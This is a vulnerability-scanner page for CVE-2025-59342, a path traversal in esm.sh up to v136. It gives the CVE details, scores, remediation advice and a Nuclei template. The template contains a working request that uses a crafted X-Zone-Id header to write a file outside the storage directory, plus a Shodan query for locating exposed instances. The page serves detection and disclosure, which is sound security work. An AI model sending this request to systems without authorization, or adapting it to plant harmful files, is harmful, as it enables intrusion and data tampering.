esm.sh <= v136 - Arbitrary File Write via Path Traversal
CVE-2025-59342
Verified
Description
esm.sh <= 136 contains a path traversal caused by improper canonicalization of the X-Zone-Id HTTP header, letting attackers write files outside the intended storage directory, exploit requires crafted header input.
Severity
Medium
CVSS Score
5.3
Exploit Probability
3%
Affected Product
esm.sh
Published Date
April 17, 2026
Template Author
0x_akoko
CVE-2025-59342.yaml
id: CVE-2025-59342
info:
name: esm.sh <= v136 - Arbitrary File Write via Path Traversal
author: 0x_Akoko
severity: medium
description: |
esm.sh <= 136 contains a path traversal caused by improper canonicalization of the X-Zone-Id HTTP header, letting attackers write files outside the intended storage directory, exploit requires crafted header input.
impact: |
Attackers can write files to arbitrary directories, potentially leading to system compromise or data tampering.
remediation: |
Update to a version later than 136 or the latest available version.
reference:
- https://github.com/esm-dev/esm.sh/security/advisories/GHSA-g2h5-cvvr-7gmw
- https://www.exploit-db.com/exploits/52461
- https://nvd.nist.gov/vuln/detail/CVE-2025-59342
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
cvss-score: 5.3
cve-id: CVE-2025-59342
cwe-id: CWE-24
epss-score: 0.02829
epss-percentile: 0.84901
metadata:
verified: true
max-request: 2
vendor: esm-dev
product: esm.sh
shodan-query: http.html:"esm.sh"
tags: cve,cve2025,esm,path-traversal,file-write,unauth
variables:
randfile: "{{to_lower(rand_text_alpha(8))}}"
flow: http(1) && http(2)
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- status_code == 200
- contains_any(body, "esm.sh", "A no-build JavaScript CDN", "import React from")
condition: and
internal: true
- raw:
- |
POST /transform HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
X-Zone-Id: ../../modules/transform/{{randfile}}/
{"filename":"{{randfile}}.js","lang":"js","code":"console.log('nuclei');","importMap":{"imports":{"react":"https://esm.sh/react"}},"target":"es2022","sourceMap":"external","minify":true}
matchers:
- type: dsl
dsl:
- status_code == 200
- contains(content_type, "application/json")
- contains_all(body, "code", "map")
condition: and
# digest: 4b0a004830460221009bf3370d1ccca4702838203547da7f6dd6925f1927a6980fb8a689a738dc98ff022100ad4ba8285e59358986db780e5f072aabc2c4d2d2be13858d1b62410146de66bb:922c64590222798bb761d5b6d8e729505.3Score
CVSS Metrics
CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
CVE ID:
cve-2025-59342
CWE ID:
cwe-24
Remediation Steps
Update to a version later than 136 or the latest available version.